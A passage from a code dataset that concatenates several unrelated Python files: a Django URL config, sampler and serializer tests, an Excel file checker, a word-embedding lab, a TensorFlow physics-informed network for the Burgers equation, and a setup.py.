\nplt.hist(hister)","sub_path":"Methods/DataBaseRetrival_Dynamic.py","file_name":"DataBaseRetrival_Dynamic.py","file_ext":"py","file_size_in_byte":2584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"64655168","text":"\"\"\"RITSOFT URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom RITSOFT_APP import views\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n\n # account urls\n path('', views.home, name='home'),\n path('about/', views.about, name='about'),\n path('contact/', views.contact, name='contact'),\n path('login/', views.login_redirect, name='login'),\n path('logout/', views.logout_view, name='logout'),\n\n # admin urls\n path('admin_home/', views.admin_home, name='admin_home'),\n\n path('designation/', views.designation, name='designation'),\n path('fetch_faculty/', views.fetch_faculty_of_dept, name='fetch_faculty'),\n path('fetch_designation/', views.fetch_designation_of_faculty, name='fetch_designation'),\n\n path('add_academic_year/', views.add_academic_year, name='add_academic_year'),\n path('change_academic_year/', views.change_academic_year, name='change_academic_year'),\n\n]\n","sub_path":"RITSOFT/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"643947835","text":"import torch\n\nfrom fastNLP.core.sampler import convert_to_torch_tensor, SequentialSampler, RandomSampler\n\n\ndef test_convert_to_torch_tensor():\n data = [[1, 2, 3, 4, 5], [5, 4, 3, 2, 1], [1, 3, 4, 5, 2]]\n ans = convert_to_torch_tensor(data, False)\n assert isinstance(ans, torch.Tensor)\n assert tuple(ans.shape) == (3, 5)\n\n\ndef test_sequential_sampler():\n sampler = SequentialSampler()\n data = [1, 3, 5, 7, 9, 2, 4, 6, 8, 10]\n for idx, i in enumerate(sampler(data)):\n assert idx == i\n\n\ndef test_random_sampler():\n sampler = RandomSampler()\n data = [1, 3, 5, 7, 9, 2, 4, 6, 8, 10]\n ans = [data[i] for i in sampler(data)]\n assert len(ans) == len(data)\n for d in ans:\n assert d in data\n\n\nif __name__ == \"__main__\":\n test_sequential_sampler()\n","sub_path":"test/core/test_sampler.py","file_name":"test_sampler.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"267928512","text":"import os\nimport openpyxl\n\n\n\n\nclass UtvarderaFil:\n\n def __init__(self, root, fil):\n self.fil = fil\n self.filplats = os.path.join(root, fil).replace(\"\\\\\",\"/\")\n\n def returnera_filplats(self):\n return self.filplats\n\n def avgor_om_excel(self):\n if self.filplats.endswith(\".xlsx\") or self.filplats.endswith(\".xlsm\"):\n return True\n\n def storlek(self):\n try:\n storlek = os.path.getsize(self.filplats)\n if storlek < 700000:\n return True\n except:\n return False\n\n def avgor_om_berper(self):\n if 
self.avgor_om_excel() and self.storlek():\n try:\n wb = openpyxl.load_workbook(self.filplats, data_only=True)\n except:\n return \"fel\"\n for sheet in wb.worksheets:\n cell_kst = sheet.cell(31, 7).value\n cell_projledare = sheet.cell(34, 7).value\n if isinstance(cell_kst, str) == True and isinstance(cell_projledare, str) == True:\n if cell_kst.lower() == \"kst\" and cell_projledare.lower() == \"projektledare\":\n wb.close()\n return sheet\n wb.close()\n\n def filnamn_clean(self):\n filnamn_clean = os.path.splitext(self.fil)[0]\n return filnamn_clean","sub_path":"utvarderafil.py","file_name":"utvarderafil.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"642844830","text":"#Francisco Arriaga, Lab4, CS2302, stores words with their embeddings and calculates similarities\r\n#between pairs of words\r\n\r\nimport numpy\r\nfrom numpy import dot\r\nfrom numpy.linalg import norm\r\nfrom HashTable import*\r\n\r\ndef reader(s):\r\n file = open(s, encoding=\"utf8\")\r\n\r\n array = file.readlines()\r\n words = []\r\n\r\n counter = 0\r\n for i in range(len(array)):\r\n line = array[i].split()\r\n if line[0].isalpha():\r\n words.append([])\r\n for j in line:\r\n words[counter].append(j)\r\n counter += 1\r\n\r\n return words\r\n\r\n\r\ndef hasher(strings):\r\n\r\n hash_table = HashTable(len(strings)//1000)\r\n\r\n for s in strings:\r\n hash_table.insert(s)\r\n\r\n return hash_table\r\n\r\n\r\ndef sims(hash_table, words):\r\n\r\n for i in range(0, 9, 2):\r\n word1 = hash_table.search(words[i][0])\r\n word2 = hash_table.search(words[i + 1][0])\r\n\r\n # print(word1)\r\n # print(word2)\r\n\r\n # cosine_sim = dot(word1, word2) / (norm(word1) * norm(word2))\r\n # print(words[i], \" - \", words[i + 1], \": \", cosine_sim)\r\n\r\n print()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n return None\r\n\r\ndef main():\r\n words = reader(\"glove.6B.50d.txt\")\r\n\r\n hash_table = hasher(words)\r\n\r\n load_factor = hash_table.get_load_factor()\r\n print(\"load factor:\", load_factor)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nmain()\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"Lab4.py","file_name":"Lab4.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"345182096","text":"import sys\nsys.path.insert(0, '../')\nimport tensorflow as tf\nimport numpy as np\nimport scipy.io\nfrom scipy.interpolate import griddata\nfrom pyDOE import lhs\nimport matplotlib.pyplot as plt\nfrom plotting import newfig, savefig\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.gridspec as gridspec\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\nimport time\nfrom constrained_optim_Adam_model_param import ConstrainedOptAdamModel\nimport os\nfrom sklearn.metrics import mean_absolute_error\nfrom sklearn.metrics import explained_variance_score\nfrom sklearn.metrics import max_error\n\nnp.random.seed(1234)\ntf.set_random_seed(1234)\n\nclass DPM:\n # Initialize the class\n def __init__(self, X_u, u, X_f, layers, lb, ub, nu, learning_rate, epsilon, delta, w):\n\n self.lb = lb\n self.ub = ub\n\n self.x_u = X_u[:, 0:1]\n self.t_u = X_u[:, 1:2]\n\n self.x_f = X_f[:, 0:1]\n self.t_f = X_f[:, 1:2]\n\n self.u = u\n\n self.layers = layers\n self.nu = nu\n\n self.learning_rate = tf.constant(learning_rate)\n self.epsilon = epsilon\n self.delta = delta\n self.w = w \n \n # Initialize NNs\n self.weights, self.biases = self.initialize_NN(layers)\n self.saver = 
tf.train.Saver(max_to_keep=30000)\n\n # tf placeholders and graph\n self.sess = tf.Session(config=tf.ConfigProto(allow_soft_placement=True,\n log_device_placement=True))\n\n self.x_u_tf = tf.placeholder(tf.float32, shape=[None, self.x_u.shape[1]])\n self.t_u_tf = tf.placeholder(tf.float32, shape=[None, self.t_u.shape[1]])\n self.u_tf = tf.placeholder(tf.float32, shape=[None, self.u.shape[1]])\n\n self.x_f_tf = tf.placeholder(tf.float32, shape=[None, self.x_f.shape[1]])\n self.t_f_tf = tf.placeholder(tf.float32, shape=[None, self.t_f.shape[1]])\n\n self.u_pred = self.net_u(self.x_u_tf, self.t_u_tf)\n self.f_pred = self.net_f(self.x_f_tf, self.t_f_tf)\n\n \n self.loss_u = tf.reduce_mean(tf.square(self.u_tf - self.u_pred)+0.01*tf.nn.l2_loss(self.W_reg)) \n self.loss_f = tf.reduce_mean(tf.square(self.f_pred)+0.01*tf.nn.l2_loss(self.W_reg))\n\n \n self.partial_loss = self.loss_u + tf.nn.relu(self.loss_f - self.epsilon)\n self.new_loss = self.partial_loss\n self.norelu_loss = self.loss_u + self.loss_f\n \n self.mape_u = tf.reduce_mean(tf.abs(self.u_tf - self.u_pred) / tf.abs(self.u_tf))\n \n self.var_u = tf.math.reduce_variance(tf.square(self.u_tf - self.u_pred))\n self.var_f = tf.math.reduce_variance(tf.square(self.f_pred))\n self.var_mape_u = tf.math.reduce_variance(tf.abs(self.u_tf - self.u_pred) / tf.abs(self.u_tf))\n\n self.worst_u = tf.math.reduce_max(tf.square(self.u_tf - self.u_pred))\n self.worst_f = tf.math.reduce_max(tf.square(self.f_pred))\n self.worst_mape_u = tf.reduce_max(tf.abs(self.u_tf - self.u_pred) / tf.abs(self.u_tf))\n self.opt = tf.train.AdamOptimizer(learning_rate= self.learning_rate)\n \n self.com = ConstrainedOptAdamModel(lr=self.learning_rate, opt=self.opt, loss=self.norelu_loss,\n delta=self.delta, w = self.w)\n self.update_Adam = self.com.adapt_budget_penalty(self.loss_u, self.loss_f - self.epsilon, None)\n \n # tf session\n self.sess = tf.Session(config=tf.ConfigProto(allow_soft_placement=True,\n log_device_placement=True))\n\n init = tf.global_variables_initializer()\n self.sess.run(init)\n\n def initialize_NN(self, layers):\n weights = []\n biases = []\n num_layers = len(layers)\n for l in range(0, num_layers - 1):\n W = self.xavier_init(size=[layers[l], layers[l + 1]])\n b = tf.Variable(tf.zeros([1, layers[l + 1]], dtype=tf.float32), dtype=tf.float32)\n self.W = W\n self.b = b\n weights.append(W)\n biases.append(b)\n return weights, biases\n\n def xavier_init(self, size):\n in_dim = size[0]\n out_dim = size[1]\n xavier_stddev = np.sqrt(2 / (in_dim + out_dim))\n return tf.Variable(tf.truncated_normal([in_dim, out_dim], stddev=xavier_stddev), dtype=tf.float32)\n\n def neural_net(self, X, weights, biases):\n num_layers = len(weights) + 1\n H = 2.0 * (X - self.lb) / (self.ub - self.lb) - 1.0\n self.W_reg = weights[0]\n b = biases[0]\n H = tf.tanh(tf.add(tf.matmul(H, self.W_reg), b))\n for l in range(1, num_layers - 2):\n self.W_reg = weights[l]\n b = biases[l]\n H = tf.tanh(tf.add(tf.add(tf.matmul(H, self.W_reg), b), H))\n self.W_reg = weights[-1]\n b = biases[-1]\n Y = tf.add(tf.matmul(H, self.W_reg), b)\n\n return Y\n\n def net_u(self, x, t):\n u = self.neural_net(tf.concat([x, t], 1), self.weights, self.biases)\n return u\n\n def net_f(self, x, t):\n u = self.net_u(x, t)\n u_t = tf.gradients(u, t)[0]\n u_x = tf.gradients(u, x)[0]\n u_xx = tf.gradients(u_x, x)[0]\n f = u_t + u * u_x - self.nu * u_xx\n\n return f\n\n def callback(self, loss):\n print('Loss', loss)\n\n\n def train(self, nIter, n_outlook, diff_loss, X_val_star, u_val_star, num_layers, num_neurons, 
learning_rate, epsilon, delta, w):\n\n tf_dict = {self.x_u_tf: self.x_u, self.t_u_tf: self.t_u, self.u_tf: self.u,\n self.x_f_tf: self.x_f, self.t_f_tf: self.t_f}\n\n n_epoch = []\n\n val_err = []\n\n loss_of_all = []\n loss_of_u = []\n loss_of_f = []\n\n mean_of_epoch_u = []\n mean_of_epoch_f = []\n mean_of_mape_u = []\n\n var_of_epoch_u = []\n var_of_epoch_f = []\n var_of_mape_u = []\n\n worst_of_epoch_u = []\n worst_of_epoch_f = []\n worst_of_mape_u = []\n\n best_val = np.inf\n \n start_time = time.time()\n \n \n for it in range(nIter): \n _, new_loss, lossu, lossf,_com_overbudget= self.sess.run([self.update_Adam, self.norelu_loss, self.loss_u, self.loss_f,self.com.overbudget], tf_dict)\n \n loss_of_all.insert(it, self.sess.run(self.new_loss, tf_dict))\n loss_of_u.insert(it, lossu)\n loss_of_f.insert(it, lossf)\n\n mean_of_epoch_u.insert(it, self.sess.run(self.loss_u, tf_dict))\n mean_of_epoch_f.insert(it, self.sess.run(self.loss_f, tf_dict))\n mean_of_mape_u.insert(it, self.sess.run(self.mape_u, tf_dict))\n\n var_of_epoch_u.insert(it, self.sess.run(self.var_u, tf_dict))\n var_of_epoch_f.insert(it, self.sess.run(self.var_f, tf_dict))\n var_of_mape_u.insert(it, self.sess.run(self.var_mape_u, tf_dict))\n\n worst_of_epoch_u.insert(it, self.sess.run(self.worst_u, tf_dict))\n worst_of_epoch_f.insert(it, self.sess.run(self.worst_f, tf_dict))\n worst_of_mape_u.insert(it, self.sess.run(self.worst_mape_u, tf_dict))\n\n n_epoch.insert(it, it)\n\n if it % n_outlook == 0:\n self.saver.save(self.sess,\n './tf_model/Viscous_burgers-con_limit-ResNet-DPM-%d-%d-%.4f-%.4f-%.3f-%.3f-%d.ckpt' % (\n num_layers, num_neurons, learning_rate, epsilon, delta, w ,it))\n\n u_tf_pred, f_tf_pred = self.predict_val(X_val_star)\n val_error = np.linalg.norm(u_val_star - u_tf_pred, 2) / np.linalg.norm(u_val_star, 2)\n val_err.insert(it, val_error)\n\n if best_val > val_error:\n best_val = val_error\n i = it\n self.saver.save(self.sess,'./tf_model/Viscous_burgers-con_limit-ResNet-DPM-%d-%d-%.4f-%.4f-%.3f-%.3f.ckpt' % (\n num_layers, num_neurons, learning_rate, epsilon, delta, w))\n elapsed = time.time() - start_time\n print('It: %d, Loss: %.3e, Time: %.2f over_budget : %.3f' % (it, new_loss, elapsed,_com_overbudget))\n start_time = time.time()\n\n return loss_of_all, loss_of_u, loss_of_f, mean_of_epoch_u, mean_of_epoch_f, mean_of_mape_u, var_of_epoch_u, var_of_epoch_f, \\\n var_of_mape_u, worst_of_epoch_u, worst_of_epoch_f, worst_of_mape_u, n_epoch, best_val, val_err, i\n\n def predict_val(self, X_star):\n u_star = self.sess.run(self.u_pred, {self.x_u_tf: X_star[:, 0:1], self.t_u_tf: X_star[:, 1:2]})\n f_star = self.sess.run(self.f_pred, {self.x_f_tf: X_star[:, 0:1], self.t_f_tf: X_star[:, 1:2]})\n\n return u_star, f_star\n\n def predict(self, X_star, it):\n self.saver.restore(self.sess,\n './tf_model/Viscous_burgers-con_limit-ResNet-DPM-%d-%d-%.4f-%.4f-%.3f-%.3f-%d.ckpt' % (\n num_layers, num_neurons, learning_rate, epsilon, delta, w, it))\n\n u_star = self.sess.run(self.u_pred, {self.x_u_tf: X_star[:, 0:1], self.t_u_tf: X_star[:, 1:2]})\n f_star = self.sess.run(self.f_pred, {self.x_f_tf: X_star[:, 0:1], self.t_f_tf: X_star[:, 1:2]})\n\n return u_star, f_star\n\n def plotting_whole_graph(self, U_star, U_pred, X_u_train, u_train, x, t, Exact):\n \n fig, ax = newfig(1.0, 0.5)\n ax.axis('off')\n \n ####### Row 0: ground truth u(t,x) ##################\n gs0 = gridspec.GridSpec(1, 2)\n gs0.update(top=4.75, bottom=4.15, left=0.15, right=0.85, wspace=0)\n ax = plt.subplot(gs0[:, :])\n \n h = ax.imshow(U_star.T, 
interpolation='nearest', cmap='rainbow',\n extent=[t.min(), t.max(), x.min(), x.max()],\n origin='lower', aspect='auto')\n divider = make_axes_locatable(ax)\n cax = divider.append_axes(\"right\", size=\"5%\", pad=0.05)\n fig.colorbar(h, cax=cax)\n \n ax.plot(X_u_train[:, 1], X_u_train[:, 0], 'kx', label='Data (%d points)' % (u_train.shape[0]), markersize=4,\n clip_on=False)\n \n line = np.linspace(x.min(), x.max(), 2)[:, None]\n ax.plot(t[:, 1000] * np.ones((2, 1)), line, 'w-', linewidth=1)\n ax.plot(t[:, 1372] * np.ones((2, 1)), line, 'w-', linewidth=1)\n \n ax.set_xlabel('$t$')\n ax.set_ylabel('$x$')\n ax.legend(frameon=False, loc='best')\n ax.set_title('$u(t,x)$', fontsize=10)\n \n ####### Row 1: prediction u(t,x) ##################\n gs1 = gridspec.GridSpec(1, 2)\n gs1.update(top=3.75, bottom=3.15, left=0.15, right=0.85, wspace=0)\n ax = plt.subplot(gs1[:, :])\n \n h = ax.imshow(U_pred.T, interpolation='nearest', cmap='rainbow',\n extent=[t.min(), t.max(), x.min(), x.max()],\n origin='lower', aspect='auto')\n divider = make_axes_locatable(ax)\n cax = divider.append_axes(\"right\", size=\"5%\", pad=0.05)\n fig.colorbar(h, cax=cax)\n \n ax.plot(X_u_train[:, 1], X_u_train[:, 0], 'kx', label='Data (%d points)' % (u_train.shape[0]), markersize=4,\n clip_on=False)\n \n line = np.linspace(x.min(), x.max(), 2)[:, None]\n ax.plot(t[:, 172] * np.ones((2, 1)), line, 'w-', linewidth=1)\n ax.plot(t[:, 515] * np.ones((2, 1)), line, 'w-', linewidth=1)\n ax.plot(t[:, 800] * np.ones((2, 1)), line, 'w-', linewidth=1)\n ax.plot(t[:, 1007] * np.ones((2, 1)), line, 'w-', linewidth=1)\n ax.plot(t[:, 1149] * np.ones((2, 1)), line, 'w-', linewidth=1)\n ax.plot(t[:, 1372] * np.ones((2, 1)), line, 'w-', linewidth=1)\n ax.plot(t[:, 1429] * np.ones((2, 1)), line, 'w-', linewidth=1)\n ax.plot(t[:, 1606] * np.ones((2, 1)), line, 'w-', linewidth=1)\n ax.plot(t[:, 1972] * np.ones((2, 1)), line, 'w-', linewidth=1)\n \n ax.set_xlabel('$t$')\n ax.set_ylabel('$x$')\n ax.legend(frameon=False, loc='best')\n ax.set_title('$u(t,x)$', fontsize=10)\n \n ####### Row 2: training set interpolation ##################\n \n gs2 = gridspec.GridSpec(1, 3)\n gs2.update(top=2.75, bottom=2.1, left=0.1, right=0.9, wspace=0.5)\n \n ax = plt.subplot(gs2[:, 0])\n ax.plot(x.transpose(), Exact[172, :], 'b-', linewidth=2, label='Exact')\n ax.plot(x.transpose(), U_pred[172, :], 'r--', linewidth=2, label='Prediction')\n ax.set_xlabel('$x$')\n ax.set_ylabel('$u(t,x)$')\n ax.set_title('$t = 2.9925$', fontsize=10)\n ax.set_xlim([-5, 105])\n ax.set_ylim([0, 6])\n \n ax = plt.subplot(gs2[:, 1])\n ax.plot(x.transpose(), Exact[515, :], 'b-', linewidth=2, label='Exact')\n ax.plot(x.transpose(), U_pred[515, :], 'r--', linewidth=2, label='Prediction')\n ax.set_xlabel('$x$')\n ax.set_ylabel('$u(t,x)$')\n ax.set_xlim([-5, 105])\n ax.set_ylim([0, 6])\n ax.set_title('$t = 8.995$', fontsize=10)\n \n ax = plt.subplot(gs2[:, 2])\n ax.plot(x.transpose(), Exact[800, :], 'b-', linewidth=2, label='Exact')\n ax.plot(x.transpose(), U_pred[800, :], 'r--', linewidth=2, label='Prediction')\n ax.set_xlabel('$x$')\n ax.set_ylabel('$u(t,x)$')\n ax.set_xlim([-5, 105])\n ax.set_ylim([0, 6])\n ax.set_title('$t = 13.9825$', fontsize=10)\n\n ####### Row 3: training set interpolation ##################\n gs3 = gridspec.GridSpec(1, 3)\n gs3.update(top=1.7, bottom=1.05, left=0.1, right=0.9, wspace=0.5)\n \n ax = plt.subplot(gs3[:, 0])\n ax.plot(x.transpose(), Exact[1007, :], 'b-', linewidth=2, label='Exact')\n ax.plot(x.transpose(), U_pred[1007, :], 'r--', linewidth=2, 
label='Prediction')\n ax.set_xlabel('$x$')\n ax.set_ylabel('$u(t,x)$')\n ax.set_title('$t = 17.605$', fontsize=10)\n ax.set_xlim([-5, 105])\n ax.set_ylim([0, 6])\n \n ax = plt.subplot(gs3[:, 1])\n ax.plot(x.transpose(), Exact[1149, :], 'b-', linewidth=2, label='Exact')\n ax.plot(x.transpose(), U_pred[1149, :], 'r--', linewidth=2, label='Prediction')\n ax.set_xlabel('$x$')\n ax.set_ylabel('$u(t,x)$')\n ax.set_xlim([-5, 105])\n ax.set_ylim([0, 6])\n ax.set_title('$t = 20.09$', fontsize=10)\n \n ax = plt.subplot(gs3[:, 2])\n ax.plot(x.transpose(), Exact[1372, :], 'b-', linewidth=2, label='Exact')\n ax.plot(x.transpose(), U_pred[1372, :], 'r--', linewidth=2, label='Prediction')\n ax.set_xlabel('$x$')\n ax.set_ylabel('$u(t,x)$')\n ax.set_xlim([-5, 105])\n ax.set_ylim([0, 6])\n ax.set_title('$t = 23.9925$', fontsize=10)\n\n ####### Row 4: training set interpolation ##################\n gs4 = gridspec.GridSpec(1, 3)\n gs4.update(top=0.65, bottom=0, left=0.1, right=0.9, wspace=0.5)\n ax = plt.subplot(gs4[:, 0])\n ax.plot(x.transpose(), Exact[1429, :], 'b-', linewidth=2, label='Exact')\n ax.plot(x.transpose(), U_pred[1429, :], 'r--', linewidth=2, label='Prediction')\n ax.set_xlabel('$x$')\n ax.set_ylabel('$u(t,x)$')\n ax.set_title('$t = 24.99$', fontsize=10)\n ax.set_xlim([-5, 105])\n ax.set_ylim([0, 6])\n \n ax = plt.subplot(gs4[:, 1])\n ax.plot(x.transpose(), Exact[1606, :], 'b-', linewidth=2, label='Exact')\n ax.plot(x.transpose(), U_pred[1606, :], 'r--', linewidth=2, label='Prediction')\n ax.set_xlabel('$x$')\n ax.set_ylabel('$u(t,x)$')\n ax.set_xlim([-5, 105])\n ax.set_ylim([0, 6])\n ax.set_title('$t = 28.0875$', fontsize=10)\n ax.legend(loc='upper center', bbox_to_anchor=(0.5, -0.35), ncol=5, frameon=False)\n \n ax = plt.subplot(gs4[:, 2])\n ax.plot(x.transpose(), Exact[1972, :], 'b-', linewidth=2, label='Exact')\n ax.plot(x.transpose(), U_pred[1972, :], 'r--', linewidth=2, label='Prediction')\n ax.set_xlabel('$x$')\n ax.set_ylabel('$u(t,x)$')\n ax.set_xlim([-5, 105])\n ax.set_ylim([0, 6])\n ax.set_title('$t = 34.4925$', fontsize=10)\n \n # savefig('./figures/Viscous_burgers-DPM-%d-%d-%.4f-%.3f-%.2f-%.3f' % (num_layers, num_neurons, learning_rate, epsilon, delta, w))\n\n\ndef main_loop(num_layers, num_neurons, learning_rate, epsilon, delta, w):\n\n N_u = 100\n N_f = 10000\n\n nu = 0.01 / np.pi\n\n num_layers = num_layers\n num_neurons = num_neurons\n learning_rate = learning_rate\n epsilon = epsilon\n delta = delta \n w = w \n \n layers = np.concatenate([[2], num_neurons * np.ones(num_layers), [1]]).astype(int).tolist()\n data = scipy.io.loadmat(\"../../Data/burgers_shock.mat\")\n\n t = data['t'].flatten()[:, None]\n x = data['x'].flatten()[:, None]\n Exact = np.real(data['usol']).T\n\n len1 = len(t[t <= 0.5]) \n len2 = len(t[t <= 0.8]) \n t_train = t[0: len1, :]\n t_val = t[len1:len2, :] \n t_test = t[len2:, :]\n\n Exact_train = Exact[: len1, :]\n Exact_val = Exact[len1:len2, :] \n Exact_test = Exact[len2:, :]\n\n X, T = np.meshgrid(x, t)\n X_train, T_train = np.meshgrid(x, t_train)\n X_val, T_val = np.meshgrid(x, t_val)\n X_test, T_test = np.meshgrid(x, t_test)\n\n X_star = np.hstack((X.flatten()[:, None], T.flatten()[:, None]))\n u_star = Exact.flatten()[:, None]\n X_tr_star = np.hstack((X_train.flatten()[:, None], T_train.flatten()[:, None]))\n u_tr_star = Exact_train.flatten()[:, None]\n X_val_star = np.hstack((X_val.flatten()[:, None], T_val.flatten()[:, None]))\n u_val_star = Exact_val.flatten()[:, None]\n X_test_star = np.hstack((X_test.flatten()[:, None], T_test.flatten()[:, 
None]))\n u_test_star = Exact_test.flatten()[:, None]\n\n lb = X_tr_star.min(0) \n ub = X_tr_star.max(0)\n\n xx1 = np.hstack((X_train[0:1, :].T, T_train[0:1, :].T))\n uu1 = Exact_train[0:1, :].T\n xx2 = np.hstack((X_train[:, 0:1], T_train[:, 0:1]))\n uu2 = Exact_train[:, 0:1]\n\n X_u_train = np.vstack([xx1, xx2])\n X_f_train = lb + (ub - lb) * lhs(2, N_f)\n X_f_train = np.vstack((X_f_train, X_u_train))\n u_train = np.vstack([uu1, uu2])\n\n idx = np.random.choice(X_u_train.shape[0], N_u, replace=False) \n X_u_train = X_u_train[idx, :]\n u_train = u_train[idx, :]\n\n start_time = time.time()\n\n model = DPM(X_u_train, u_train, X_f_train, layers, lb, ub, nu, learning_rate, epsilon, delta, w)\n\n loss, loss_u, loss_f, mean_u_of_epoch, mean_f_of_epoch, mean_mape_u_of_epoch, var_u_of_epoch, var_f_of_epoch, var_mape_u_of_epoch, \\\n worst_u_of_epoch, worst_f_of_epoch, worst_mape_u_of_epoch, epoch, error_u_extra, validation_error, best_it =\\\n model.train(30000, 50, 0.00001, X_val_star, u_val_star, num_layers, num_neurons, learning_rate, epsilon, delta, w)\n u_pred_inter, f_pred_inter = model.predict(X_tr_star, best_it)\n u_pred_test, f_pred_test = model.predict(X_test_star, best_it)\n u_pred, f_pred = model.predict(X_star, best_it)\n\n elapsed = time.time() - start_time\n print('Training time: %.4f' % (elapsed))\n\n error_u_inter = np.linalg.norm(u_tr_star- u_pred_inter, 2) / np.linalg.norm(u_tr_star, 2)\n print('Error u: %e' % (error_u_inter))\n\n print('Error u: %e' % (error_u_extra))\n\n error_u_test = np.linalg.norm(u_test_star - u_pred_test, 2) / np.linalg.norm(u_test_star, 2)\n print('Error u: %e' % (error_u_test))\n\n # plotting\n\n U_star = griddata(X_star, u_star.flatten(), (X, T), method='cubic')\n U_pred = griddata(X_star, u_pred.flatten(), (X, T), method='cubic')\n \n model.plotting_whole_graph(U_star, U_pred, X_u_train, u_train, x, t, Exact)\n\n return error_u_inter, error_u_extra, error_u_test, best_it\n\n\nif __name__ == \"__main__\":\n\n num_layers = int(sys.argv[1])\n num_neurons = int(sys.argv[2])\n learning_rate = float(sys.argv[3])\n epsilon = float(sys.argv[4])\n delta = float(sys.argv[5])\n w = float(sys.argv[6])\n \n result = main_loop(num_layers, num_neurons, learning_rate, epsilon, delta, w)\n print(result)\n \n","sub_path":"Viscous_Burgers/Burgers_parameter_opt_Adam_con_limit_ResNet_DPM.py","file_name":"Burgers_parameter_opt_Adam_con_limit_ResNet_DPM.py","file_ext":"py","file_size_in_byte":20096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"244845690","text":"from django.test import TestCase\nfrom rest_framework.exceptions import ValidationError\n\nfrom soccer.serializers import SoccerStatCreateSerializer, MatchCreateSerializer\n\nfrom users.models import User\nfrom soccer.models import Match, SoccerStat\n\n\nclass SoccerStatCreateSerializerTest(TestCase):\n\n def setUp(self):\n self.user = User.objects.create(username='Joe')\n\n def test_with_match(self):\n match = Match.objects.create()\n valid_data = {'user': self.user.id, 'stat_type': 'goal', 'value': 1, 'stat_uuid': 'some-uuid', 'match': match.id}\n serializer = SoccerStatCreateSerializer(data=valid_data)\n stat, created = serializer.get_or_create()\n\n stat.refresh_from_db()\n self.assertTrue(created)\n self.assertEqual('some-uuid', stat.stat_uuid)\n\n def test_without_match(self):\n valid_data = {'user': self.user.id, 'stat_type': 'kcoins', 'value': 1, 'stat_uuid': 'some-uuid'}\n serializer = SoccerStatCreateSerializer(data=valid_data)\n stat, created = 
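# --- Hedged aside: the serializer tests that follow pin idempotency on
# stat_uuid -- submitting a duplicate uuid must return the existing row
# with its original value, untouched. In Django ORM terms the expected
# behaviour is the get_or_create pattern (a sketch; the real serializer
# implementation is not shown in this record):
# stat, created = SoccerStat.objects.get_or_create(
#     stat_uuid=data['stat_uuid'],
#     defaults={'user': user, 'stat_type': data['stat_type'], 'value': data['value']},
# )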
serializer.get_or_create()\n\n stat.refresh_from_db()\n self.assertTrue(created)\n self.assertEqual('some-uuid', stat.stat_uuid)\n self.assertIsNone(stat.match)\n\n def test_with_existing_uuid(self):\n existing_uuid = 'test-uuid'\n existing_stat = SoccerStat.objects.create(user=self.user, stat_uuid=existing_uuid, stat_type='kcoins', value=5)\n\n valid_data = {'user': self.user.id, 'stat_type': 'kcoins', 'value': 10, 'stat_uuid': existing_uuid}\n serializer = SoccerStatCreateSerializer(data=valid_data)\n stat, created = serializer.get_or_create()\n\n self.assertFalse(created)\n self.assertEqual(existing_stat.id, stat.id)\n self.assertEqual(existing_uuid, stat.stat_uuid)\n\n def test_with_invalid_data(self):\n invalid_data = {'user': self.user.id, 'stat_type': 'invalid', 'value': 1, 'stat_uuid': 'some-uuid'}\n serializer = SoccerStatCreateSerializer(data=invalid_data)\n self.assertRaises(ValidationError, lambda: serializer.get_or_create())\n\n\nclass CreateMatchSerializerTest(TestCase):\n\n def setUp(self):\n super().setUp()\n\n def test_success(self):\n valid_data = {'competition': 'comp', 'home_team': 'a', 'away_team': 'b', 'home_players': ['user1', 'user2'], 'away_players': ['user3', 'user4']}\n serializer = MatchCreateSerializer(data=valid_data)\n self.assertTrue(serializer.is_valid(), serializer.errors)\n\n def test_user_in_both_teams(self):\n invalid_data = {'competition': 'comp', 'home_team': 'a', 'away_team': 'b', 'home_players': ['user1', 'user2'], 'away_players': ['user2', 'user3']}\n serializer = MatchCreateSerializer(data=invalid_data)\n self.assertFalse(serializer.is_valid())\n\n def test_away_players_missing(self):\n invalid_data = {'competition': 'comp', 'home_team': 'a', 'away_team': 'b', 'home_players': ['user1', 'user2']}\n serializer = MatchCreateSerializer(data=invalid_data)\n self.assertFalse(serializer.is_valid())\n","sub_path":"kbackend/soccer/test/test_serializers.py","file_name":"test_serializers.py","file_ext":"py","file_size_in_byte":3045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"641890721","text":"from setuptools import setup\n\nrequirements = [\n # package requirements go here\n]\n\nsetup(\n name='psl',\n description=\"dynamic Systems Library in Python\",\n license=\"MIT\",\n author=\"Aaron Tuor, Jan Drgona, Elliott Skomski, Soumya Vasisht\",\n author_email='aarontuor@gmail.com',\n url='https://github.com/aarontuor/psl',\n packages=['psl'],\n package_data={'psl': ['psl/parameters/buildings/*']},\n entry_points={\n 'console_scripts': [\n 'psl=psl.cli:cli'\n ]\n },\n install_requires=requirements,\n keywords='psl',\n classifiers=[\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3.6',\n 